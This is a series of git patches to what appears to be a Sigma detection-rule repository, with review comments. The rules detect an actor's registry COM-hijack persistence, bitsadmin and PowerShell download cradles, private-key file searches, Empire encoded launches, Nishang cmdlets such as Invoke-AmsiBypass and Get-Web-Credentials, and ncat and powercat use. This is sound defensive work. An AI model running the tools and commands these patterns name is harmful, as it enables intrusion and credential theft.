From: Tran Trung Hieu Date: Fri, 16 Jul 2021 14:13:48 +0700 Subject: [PATCH 0015/1367] Suspicious behaviours related to SOURGUM --- .../process_creation/sysmon_apt_sourgrum.yml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_apt_sourgrum.yml diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml new file mode 100644 index 00000000..661a20dd --- /dev/null +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml 
@@ -0,0 +1,43 @@
+title: SOURGUM Actor Behaviours
+id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd
+description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
+author:
+ - MSTIC
+ - FPT.EagleEye
+status: experimental
+level: high
+references:
+ - sha256=c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d
+ - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml
+ - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
+date: 2021/06/15
+tags:
+ - attack.t1546
+ - attack.t1546.015
+ - attack.persistence
+ - attack.privilege_escalation
+logsource:
+ category: process_creation
+ product: sysmon
+detection:
+ selection1:
+ Image|contains: 'windows\system32\Physmem.sys'
+ selection2:
+ Image|contains:
+ - 'Windows\system32\ime\SHARED\WimBootConfigurations.ini'
+ - 'Windows\system32\ime\IMEJP\WimBootConfigurations.ini'
+ - 'Windows\system32\ime\IMETC\WimBootConfigurations.ini'
+ selection3:
+ Image|contains:
+ - 'windows\system32\filepath2'
+ - 'windows\system32\ime'
+ registry_command:
+ CommandLine|contains:
+ - 'reg add'
+ registry_key:
+ CommandLine|contains:
+ - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32'
+ - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32'
+ condition: selection1 or selection2 or (selection3 and registry_command and registry_key)
+falsepositives:
+ - Unknown
From 8effde4e1d98bcb4912be04cd09515fadb490879 Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Fri, 16 Jul 2021 16:40:00 +0700 Subject: [PATCH 0016/1367] More suspicious flag fot bitsadmin execution --- .../win_process_creation_bitsadmin_download.yml | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) 
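Review bot: `selection1` and `selection2` test `Image|contains` against `Physmem.sys` and `WimBootConfigurations.ini`, but in a `process_creation` source `Image` is the path of the executed binary, so a driver or an `.ini` file is unlikely ever to appear there; these indicators look like they belong to a file-event or driver-load logsource, or to `CommandLine|contains` in this one, and as written those two selections may never fire. `logsource` also uses `product: sysmon` where the repository's other process-creation rules use `product: windows` (compare the bitsadmin rule in the next commit), which affects config-based field mapping. The `references` item `sha256=...` is not a URL and would be clearer as the sample hash in `description`, and `date: 2021/06/15` predates the cited 2021-07-15 blog post.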
diff --git a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml index 4cbadca4..f6c8a5fb 100644 --- a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +++ b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml @@ -5,6 +5,7 @@ description: Detects usage of bitsadmin downloading a file references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 + - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ tags: - attack.defense_evasion - attack.persistence @@ -12,8 +13,10 @@ tags: - attack.s0190 - attack.t1036.003 date: 2017/03/09 -modified: 2020/09/06 -author: Michael Haag +modified: 2021/07/16 +author: + - Michael Haag + - FPT.EagleEye logsource: category: process_creation product: windows @@ -21,12 +24,20 @@ detection: selection1: Image|endswith: - '\bitsadmin.exe' + susp_flag_1: CommandLine|contains: - ' /transfer ' + susp_flag_2: + CommandLine|contains: + - ' /create ' + - ' /addfile ' + http_flag: + CommandLine|contains: + - 'http' selection2: CommandLine|contains: - 'copy bitsadmin.exe' - condition: selection1 or selection2 + condition: (selection1 and susp_flag_2 and http_flag) or (selection1 and susp_flag_1) or selection2 fields: - CommandLine - ParentCommandLine From 7c6ef062c5bf2df8fe0c7848656675698a670d70 Mon Sep 17 00:00:00 2001 From: Ibrahim Ali Khan Date: Fri, 16 Jul 2021 23:08:03 +0500 Subject: [PATCH 0017/1367] Create ala-suricata.yml Suricata logs mapping for Azure Log Analytics added --- tools/config/ala-suricata.yml | 52 +++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 tools/config/ala-suricata.yml diff --git a/tools/config/ala-suricata.yml b/tools/config/ala-suricata.yml new file mode 100644 index 00000000..fd3a69ec --- /dev/null +++ b/tools/config/ala-suricata.yml 
@@ -0,0 +1,52 @@ +title: Suricata logs mapping for Azure Log Analytics +order: 20 +backends: + - ala + - ala-rule +fieldmappings: + timestamp: parse_json(RawData).timestamp + flow_id: parse_json(RawData).flow_id + in_iface: parse_json(RawData).in_iface + event_type: parse_json(RawData).event_type + src_ip: parse_json(RawData).src_ip + src_port: parse_json(RawData).src_port + dest_ip: parse_json(RawData).dest_ip + dest_port: parse_json(RawData).dest_port + proto: parse_json(RawData).proto + tx_id: parse_json(RawData).tx_id + alert.action: parse_json(RawData).alert.action + alert.gid: parse_json(RawData).alert.gid + alert.signature_id: parse_json(RawData).alert.signature_id + alert.rev: parse_json(RawData).alert.rev + alert.signature: parse_json(RawData).alert.signature + alert.category: parse_json(RawData).alert.category + alert.severity: parse_json(RawData).alert.severity + alert.metadata.updated_at: parse_json(RawData).alert.metadata.updated_at + alert.metadata.created_at: parse_json(RawData).alert.metadata.created_at + alert.metadata.cve: parse_json(RawData).alert.metadata.cve + suricata.eve.alert.metadata.cve: parse_json(RawData).alert.metadata.cve + alert.metadata.signature_severity: parse_json(RawData).alert.metadata.signature_severity + alert.metadata.deployment: parse_json(RawData).alert.metadata.deployment + alert.metadata.tag: parse_json(RawData).alert.metadata.tag + suricata.eve.alert.metadata.tag: parse_json(RawData).alert.metadata.tag + alert.metadata.attack_target: parse_json(RawData).alert.metadata.attack_target + alert.metadata.affected_product: parse_json(RawData).alert.metadata.affected_product + dns.query: parse_json(RawData).dns.query + app_proto: parse_json(RawData).app_proto + flow.pkts_toserver: parse_json(RawData).flow.pkts_toserver + flow.pkts_toclient: parse_json(RawData).flow.pkts_toclient + flow.bytes_toserver: parse_json(RawData).flow.bytes_toserver + flow.bytes_toclient: parse_json(RawData).flow.bytes_toclient + flow.start: 
parse_json(RawData).flow.start + payload_printable: parse_json(RawData).payload_printable + stream: parse_json(RawData).stream + http.hostname: parse_json(RawData).http.hostname + http.url: parse_json(RawData).http.url + http.http_user_agent: parse_json(RawData).http.http_user_agent + http.http_method: parse_json(RawData).http.http_method + http.protocol: parse_json(RawData).http.protocol + http.length: parse_json(RawData).http.length + http.status: parse_json(RawData).http.status + http.http_refer: parse_json(RawData).http.http_refer + fileinfo.filename: parse_json(RawData).file.path + fileinfo.size: parse_json(RawData).file.size From 50c47a4ed0fcdbe260299fbe5ae4578d0d9eeb74 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 17 Jul 2021 10:32:29 +0200 Subject: [PATCH 0018/1367] check duplicate id --- tests/test_rules.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 9849bbdd..6f4ed6f7 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -234,6 +234,7 @@ class TestRules(unittest.TestCase): def test_missing_id(self): faulty_rules = [] + list_id = [] for file in self.yield_next_rule_file_path(self.path_to_rules): id = self.get_rule_part(file_path=file, part_name="id") if not id: @@ -242,6 +243,11 @@ class TestRules(unittest.TestCase): elif len(id) != 36: print(Fore.YELLOW + "Rule {} has a malformed 'id' (not 36 chars).".format(file)) faulty_rules.append(file) + elif id in list_id: + print(Fore.YELLOW + "Rule {} has a duplicate 'id'.".format(file)) + faulty_rules.append(file) + else: + list_id.append(id) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") From da6135ccb3fb1576d6d22ae59b55c42b531e0fc2 Mon Sep 17 00:00:00 2001 
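Review bot: `fileinfo.filename` and `fileinfo.size` are the only entries whose target does not mirror the sigma field name — they read `file.path` and `file.size` from `RawData`, while every other mapping uses the EVE key verbatim (`dns.query`, `http.url`, `flow.start`). If the Log Analytics records are standard Suricata EVE JSON, the file record nests these under `fileinfo`, so the mapping would likely need `parse_json(RawData).fileinfo.filename` and `parse_json(RawData).fileinfo.size`; worth confirming against a real record before file rules are relied on. `alert.metadata.cve` and `alert.metadata.tag` are each mapped twice (once with a `suricata.eve.` prefix), which is harmless but deserves a one-line comment saying which rule sets use which spelling.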
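Review bot: The duplicate check reports only the second file carrying an id, so the failure never tells the maintainer which two rules collide; keeping a dict from id to the first path and printing both, `print(Fore.YELLOW + "Rule {} has a duplicate 'id' (already used by {}).".format(file, seen[id]))`, makes the failure actionable. `id in list_id` on a list is also a linear scan per rule, and a dict or set lookup avoids that at no cost. The assertion text at the end of the hunk still says "missing or malformed" and should mention duplicates as well; `test_missing_id` starts in the previous hunk.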
From: frack113
Date: Tue, 20 Jul 2021 11:20:30 +0200
Subject: [PATCH 0019/1367] add process_creation_discover_private_keys.yml
---
 ...process_creation_discover_private_keys.yml | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 rules/windows/process_creation/process_creation_discover_private_keys.yml
diff --git a/rules/windows/process_creation/process_creation_discover_private_keys.yml b/rules/windows/process_creation/process_creation_discover_private_keys.yml
new file mode 100644
index 00000000..99251447
--- /dev/null
+++ b/rules/windows/process_creation/process_creation_discover_private_keys.yml
@@ -0,0 +1,40 @@
+title: Discover Private Keys
+id: 213d6a77-3d55-4ce8-ba74-fcfef741974e
+status: experimental
+author: frack113
+date: 2021/07/20
+description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md
+tags:
+ - attack.credential-access
+ - attack.t1552.004
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_exe:
+ CommandLine|contains:
+ - 'dir '
+ - 'findstr '
+ selection_ext:
+ CommandLine|contains:
+ - '.key'
+ - '.pgp'
+ - '.gpg'
+ - '.ppk'
+ - '.p12'
+ - '.pem'
+ - '.pfx'
+ - '.cer'
+ - '.p7b'
+ - '.asc'
+ condition: selection_exe and selection_ext
+fields:
+ - ComputerName
+ - User
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - Unknown
+level: medium
From 66aaa2210cf400c1ef04f8263167f41b497606eb Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Tue, 20 Jul 2021 11:26:22 +0200
Subject: [PATCH 0020/1367] refactor: widened PS1 Empire cmdlines rule
---
 .../process_creation/win_susp_powershell_empire_launch.yml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
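Review bot: `selection_exe` uses `CommandLine|contains: 'dir '`, which also matches `mkdir `, `rmdir ` and any path component ending in `dir` followed by a space, and `'.key'` in `selection_ext` matches `.keystore`, so the rule will be noisier than `level: medium` suggests. Anchoring the command (`' dir '`, `'findstr '`) and scoping `selection_exe` to `Image|endswith: '\cmd.exe'` / `'\findstr.exe'` narrows it without losing the atomic test cases the reference describes. The description ends in `for insecurely stored credential`; `credentials` is the intended noun.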
diff --git a/rules/windows/process_creation/win_susp_powershell_empire_launch.yml b/rules/windows/process_creation/win_susp_powershell_empire_launch.yml index 3859866a..7b63469b 100644 --- a/rules/windows/process_creation/win_susp_powershell_empire_launch.yml +++ b/rules/windows/process_creation/win_susp_powershell_empire_launch.yml @@ -9,7 +9,7 @@ references: - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64 author: Florian Roth date: 2019/04/20 -modified: 2020/07/13 +modified: 2020/07/20 tags: - attack.execution - attack.t1059.001 @@ -25,6 +25,8 @@ detection: - ' -NoP -NonI -W Hidden -enc ' - ' -noP -sta -w 1 -enc' - ' -enc SQB' - - ' -nop -exec bypass -EncodedCommand SQB' + - ' -nop -exec bypass -EncodedCommand ' condition: selection +falsepositives: + - Other tools that incidentally use the same command line parameters level: critical From cf8904b56000d58aef53675598973b738261a6db Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 12:22:31 +0200 Subject: [PATCH 0021/1367] fix files_with_incorrect_mitre_tags --- .../process_creation/process_creation_discover_private_keys.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_discover_private_keys.yml b/rules/windows/process_creation/process_creation_discover_private_keys.yml index 99251447..7400b511 100644 --- a/rules/windows/process_creation/process_creation_discover_private_keys.yml +++ b/rules/windows/process_creation/process_creation_discover_private_keys.yml @@ -7,7 +7,7 @@ description: Adversaries may search for private key certificate files on comprom references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md tags: - - attack.credential-access + - attack.credential_access - attack.t1552.004 logsource: category: process_creation 
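Review bot: `modified: 2020/07/20` is a year behind — the previous value was `2020/07/13` and the commit is dated 20 Jul 2021 — so it should read `modified: 2021/07/20`; a format-only date test will not catch this. Dropping the `SQB` suffix from `' -nop -exec bypass -EncodedCommand '` widens the match to any encoded command passed with those flags, which the new `falsepositives` entry acknowledges, but at `level: critical` a short comment on why that flag combination is still considered high-confidence would help triage.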
From b031a1b4b7d3df6ed4303c45d7d9ae675aa97c26 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 20 Jul 2021 13:13:53 +0200
Subject: [PATCH 0022/1367] add win_susp_zip_compress.yml
---
 .../windows/builtin/win_susp_zip_compress.yml | 51 +++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 rules/windows/builtin/win_susp_zip_compress.yml
diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/builtin/win_susp_zip_compress.yml
new file mode 100644
index 00000000..b4bb1bbb
--- /dev/null
+++ b/rules/windows/builtin/win_susp_zip_compress.yml
@@ -0,0 +1,51 @@
+action: global
+title: Zip A Folder With PowerShell For Staging In Temp
+id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98
+status: experimental
+author: frack113
+date: 2021/07/20
+description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md
+tags:
+ - attack.collection
+ - attack.t1074.001
+falsepositives:
+ - Unknown
+level: medium
+---
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ selection:
+ CommandLine|contains|all:
+ - 'Compress-Archive '
+ - ' -Path '
+ - ' -DestinationPath '
+ - '$env:TEMP\'
+ condition: selection
+---
+logsource:
+ product: windows
+ service: powershell-classic
+detection:
+ selection:
+ HostApplication|contains|all:
+ - 'Compress-Archive '
+ - ' -Path '
+ - ' -DestinationPath '
+ - '$env:TEMP\'
+ condition: selection
+---
+logsource:
+ product: windows
+ service: powershell
+detection:
+ selection:
+ ContextInfo|contains|all:
+ - 'Compress-Archive '
+ - ' -Path '
+ - ' -DestinationPath '
+ - '$env:TEMP\'
+ condition: selection
\ No newline at end of file
From 42005a07b76da82c78a94e8ed48237d933231a8c Mon Sep 17 00:00:00 2001
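Review bot: The `powershell-classic` section filters only on `HostApplication|contains|all` with no `EventID`, and the `powershell` section likewise has none; per the author's own comment in the next rule on this page, classic logging emits events 400, 403 and 600 with the same `HostApplication` for a single execution, so one staging command yields three alerts. Adding `EventID: 400` to the classic section and `EventID: 4103` to the `ContextInfo` section, as the later `powershell_powercat.yml` on this page does, keeps it to one hit per execution. `'$env:TEMP\'` is also the only spelling matched; `${env:TEMP}\` resolves identically and would be missed, so either add it or note the gap in a comment. The file also lacks a trailing newline.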
From: frack113 Date: Tue, 20 Jul 2021 16:12:24 +0200 Subject: [PATCH 0023/1367] update powershell_suspicious_download.yml --- .../powershell_suspicious_download.yml | 25 ++++++++++++++++--- 1 file changed, 22 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 8d9ea014..52166117 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -1,3 +1,4 @@ +action: global title: Suspicious PowerShell Download id: 65531a81-a694-4e31-ae04-f8ba5bc33759 status: experimental @@ -8,6 +9,11 @@ tags: - attack.t1086 #an old one author: Florian Roth date: 2017/03/05 +modified: 2021/07/20 +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium +--- logsource: product: windows service: powershell @@ -21,6 +27,19 @@ detection: - 'System.Net.WebClient' - '.DownloadString(' condition: downloadfile or downloadstring -falsepositives: - - PowerShell scripts that download content from the Internet -level: medium +--- +logsource: + product: windows + service: powershell-classic +detection: + downloadfile: + EventID: 400 # get 400 ,403 and 600 for 1 execution + HostApplication|contains|all: + - 'System.Net.WebClient' + - '.DownloadFile(' + downloadstring: + Eventid: 400 + HostApplication|contains|all: + - 'System.Net.WebClient' + - '.DownloadString(' + condition: downloadfile or downloadstring \ No newline at end of file From ba50a2309c75ec49a25a25c767658460cf52ac4e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 16:26:13 +0200 Subject: [PATCH 0024/1367] fix case EventID --- rules/windows/powershell/powershell_suspicious_download.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
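Review bot: The new `powershell-classic` section matches on `HostApplication`, which in events 400/403/600 is the command line of the hosting process rather than the content of a script it runs, so a `.DownloadString(` inside a `.ps1` file is only caught by the `powershell` section above; a comment on the section, `# HostApplication carries only the host command line: covers inline/encoded commands, not script files`, sets expectations for analysts. The comment `# get 400 ,403 and 600 for 1 execution` explains the `EventID: 400` choice but reads oddly; `# 400, 403 and 600 are all emitted for one execution, keep only 400` is clearer. The file also ends without a trailing newline.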
diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 52166117..4677ef36 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -38,7 +38,7 @@ detection: - 'System.Net.WebClient' - '.DownloadFile(' downloadstring: - Eventid: 400 + EventID: 400 HostApplication|contains|all: - 'System.Net.WebClient' - '.DownloadString(' From ddb47446137fce86efda39f7e6abdfefa386e3c7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Jul 2021 21:14:48 +0200 Subject: [PATCH 0025/1367] regsvr32 anomaly rule update https://twitter.com/BlackMatter23/status/1417545425297580045 --- rules/windows/process_creation/win_susp_regsvr32_no_dll.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index 50c46fd7..021e88fb 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -4,6 +4,7 @@ status: experimental description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line author: Florian Roth date: 2019/07/17 +modified: 2021/07/20 references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ tags: @@ -21,6 +22,8 @@ detection: - '.ocx' - '.cpl' - '.ax' + - '.bav' + - '.ppl' condition: selection and not filter fields: - CommandLine From b9b0ef20666e72cf47f3d8c9a694ef197ade199d Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 09:44:26 +0200 Subject: [PATCH 0026/1367] convert keywords to correct field name Payload --- .../powershell/powershell_nishang_malicious_commandlets.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
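Review bot: Judging from `condition: selection and not filter`, the list receiving `'.bav'` and `'.ppl'` appears to be the exclusion list, so regsvr32 invocations naming those extensions are no longer reported; the hunk does not show which selection the list belongs to nor why these two extensions are benign, and the tweet in the commit message is the only hint. An inline comment next to the new entries, `# .bav/.ppl: legitimate non-DLL extensions observed with regsvr32, see reference`, would stop a later maintainer from reading this as an attacker-chosen extension being whitelisted and reverting it. The `filter` definition starts outside the hunk.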
diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml index 21547f4d..aa660129 100644 --- a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: experimental description: Detects Commandlet names and arguments from the Nishang exploitation framework date: 2019/05/16 -modified: 2021/04/23 +modified: 2021/07/21 references: - https://github.com/samratashok/nishang tags: @@ -16,7 +16,7 @@ logsource: service: powershell definition: It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277 detection: - keywords: + Payload: - Add-ConstrainedDelegationBackdoor - Set-DCShadowPermissions - DNS_TXT_Pwnage From 44254038d377dc9639f9a76214e59d942645469a Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 10:01:46 +0200 Subject: [PATCH 0027/1367] fix human error : test-sigmac Error 4 --- ...wershell_nishang_malicious_commandlets.yml | 145 +++++++++--------- 1 file changed, 73 insertions(+), 72 deletions(-) diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml index aa660129..e8a9ef6c 100644 --- a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml 
@@ -16,78 +16,79 @@ logsource: service: powershell definition: It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277 detection: - Payload: - - Add-ConstrainedDelegationBackdoor - - Set-DCShadowPermissions - - DNS_TXT_Pwnage - - Execute-OnTime - - HTTP-Backdoor - - Set-RemotePSRemoting - - Set-RemoteWMI - - Invoke-AmsiBypass - - Out-CHM - - Out-HTA - - Out-SCF - - Out-SCT - - Out-Shortcut - - Out-WebQuery - - Out-Word - - Enable-Duplication - - Remove-Update - - Download-Execute-PS - - Download_Execute - - Execute-Command-MSSQL - - Execute-DNSTXT-Code - - Out-RundllCommand - - Copy-VSS - - FireBuster - - FireListener - - Get-Information - - Get-PassHints - - Get-WLAN-Keys - - Get-Web-Credentials - - Invoke-CredentialsPhish - - Invoke-MimikatzWDigestDowngrade - - Invoke-SSIDExfil - - Invoke-SessionGopher - - Keylogger - - Invoke-Interceptor - - Create-MultipleSessions - - Invoke-NetworkRelay - - Run-EXEonRemote - - Invoke-Prasadhak - - Invoke-BruteForce - - Password-List - - Invoke-JSRatRegsvr - - Invoke-JSRatRundll - - Invoke-PoshRatHttps - - Invoke-PowerShellIcmp - - Invoke-PowerShellUdp - - Invoke-PSGcat - - Invoke-PsGcatAgent - - Remove-PoshRat - - Add-Persistance - - ExetoText - - Invoke-Decode - - Invoke-Encode - - Parse_Keys - - Remove-Persistence - - StringtoBase64 - - TexttoExe - - Powerpreter - - Nishang - - DataToEncode - - LoggedKeys - - OUT-DNSTXT - # - Jitter # Prone to FPs - - ExfilOption - - DumpCerts - - DumpCreds - - Shellcode32 - - Shellcode64 - - NotAllNameSpaces - - exfill - - FakeDC + keywords: + Payload|contains: + - Add-ConstrainedDelegationBackdoor + - Set-DCShadowPermissions + - DNS_TXT_Pwnage + - Execute-OnTime + - HTTP-Backdoor + - Set-RemotePSRemoting + - Set-RemoteWMI + - Invoke-AmsiBypass + - Out-CHM + - Out-HTA + - Out-SCF + - Out-SCT + - Out-Shortcut + - Out-WebQuery + - Out-Word + - Enable-Duplication + - Remove-Update + - Download-Execute-PS + - Download_Execute + - 
Execute-Command-MSSQL + - Execute-DNSTXT-Code + - Out-RundllCommand + - Copy-VSS + - FireBuster + - FireListener + - Get-Information + - Get-PassHints + - Get-WLAN-Keys + - Get-Web-Credentials + - Invoke-CredentialsPhish + - Invoke-MimikatzWDigestDowngrade + - Invoke-SSIDExfil + - Invoke-SessionGopher + - Keylogger + - Invoke-Interceptor + - Create-MultipleSessions + - Invoke-NetworkRelay + - Run-EXEonRemote + - Invoke-Prasadhak + - Invoke-BruteForce + - Password-List + - Invoke-JSRatRegsvr + - Invoke-JSRatRundll + - Invoke-PoshRatHttps + - Invoke-PowerShellIcmp + - Invoke-PowerShellUdp + - Invoke-PSGcat + - Invoke-PsGcatAgent + - Remove-PoshRat + - Add-Persistance + - ExetoText + - Invoke-Decode + - Invoke-Encode + - Parse_Keys + - Remove-Persistence + - StringtoBase64 + - TexttoExe + - Powerpreter + - Nishang + - DataToEncode + - LoggedKeys + - OUT-DNSTXT + # - Jitter # Prone to FPs + - ExfilOption + - DumpCerts + - DumpCreds + - Shellcode32 + - Shellcode64 + - NotAllNameSpaces + - exfill + - FakeDC condition: keywords falsepositives: - Penetration testing From 1b537cac5d2a2065b03fffb06e15dcc29aea58d4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 10:55:54 +0200 Subject: [PATCH 0028/1367] add sysmon_netcat_execution.yml --- .../sysmon_netcat_execution.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_netcat_execution.yml diff --git a/rules/windows/process_creation/sysmon_netcat_execution.yml b/rules/windows/process_creation/sysmon_netcat_execution.yml new file mode 100644 index 00000000..5c187881 --- /dev/null +++ b/rules/windows/process_creation/sysmon_netcat_execution.yml 
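Review bot: `Payload|contains` with short, generic tokens such as `Keylogger`, `Password-List`, `exfill`, `DataToEncode` and `LoggedKeys` will substring-match benign script text and module help, and the author already had to comment out `Jitter` for exactly that reason; either re-examine those entries or move them into a separate `selection_weak` that the condition only accepts together with a Nishang-specific cmdlet name, so the precise names keep doing the work. The `condition: keywords` and `falsepositives` lines close the hunk, so the rule's remaining fields are outside it.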
@@ -0,0 +1,24 @@
+title: Ncat Execution
+id: e31033fc-33f0-4020-9a16-faf9b31cbf08
+status: experimental
+author: frack113
+date: 2021/07/21
+description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
+references:
+ - https://nmap.org/ncat/
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md
+tags:
+ - attack.command_and_control
+ - attack.t1095
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ # can not use OriginalFileName as is empty
+ Image|endswith:
+ - '\ncat.exe'
+ condition: selection
+falsepositives:
+ - Legitimate ncat use
+level: medium
From 41c4f1d1575d29d0976c76204746dee585a94ca8 Mon Sep 17 00:00:00 2001
From: frack113
Date: Wed, 21 Jul 2021 13:04:27 +0200
Subject: [PATCH 0029/1367] add powershell_powercat.yml
---
 .../powershell/powershell_powercat.yml | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 rules/windows/powershell/powershell_powercat.yml
diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml
new file mode 100644
index 00000000..24a1a7af
--- /dev/null
+++ b/rules/windows/powershell/powershell_powercat.yml
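Review bot: The `description` is the ATT&CK T1095 technique text and does not say what the rule detects, which is a process whose image name ends in `\ncat.exe`; `description: Detects execution of the Ncat (Nmap netcat) binary by its image name` tells an analyst what actually fired. Because the match is on `Image` alone, a renamed copy is not covered, and the existing comment `# can not use OriginalFileName as is empty` is the natural place to state that limitation explicitly.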
@@ -0,0 +1,40 @@ +action: global +title: Netcat The Powershell Version +id: c5b20776-639a-49bf-94c7-84f912b91c15 +status: experimental +author: frack113 +date: 2021/07/21 +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/besimorhino/powercat + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md +tags: + - attack.command_and_control + - attack.t109 +falsepositives: + - Unknown +level: medium +--- +logsource: + product: windows + service: powershell-classic +detection: + selection: + EventID: 400 + HostApplication|contains: + - 'powercat ' + - 'powercat.ps1' + condition: selection +--- +logsource: + product: windows + service: powershell + +detection: + selection: + EventID: 4103 + ContextInfo|contains: + - 'powercat ' + - 'powercat.ps1' + condition: selection From 72da7a30539cb18a294e1850667a687a10e655c9 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 13:08:35 +0200 Subject: [PATCH 0030/1367] fix tags attack.t1095 --- rules/windows/powershell/powershell_powercat.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index 24a1a7af..ab4bf464 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -11,7 +11,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md tags: - attack.command_and_control - - attack.t109 + - attack.t1095 falsepositives: - Unknown level: medium From 4cc4df35d82e738c46d7c80cf3c010926e1dbcd1 Mon Sep 17 00:00:00 2001 
From: frack113
Date: Wed, 21 Jul 2021 15:27:12 +0200
Subject: [PATCH 0031/1367] add powershell_suspicious_mail_acces.yml
---
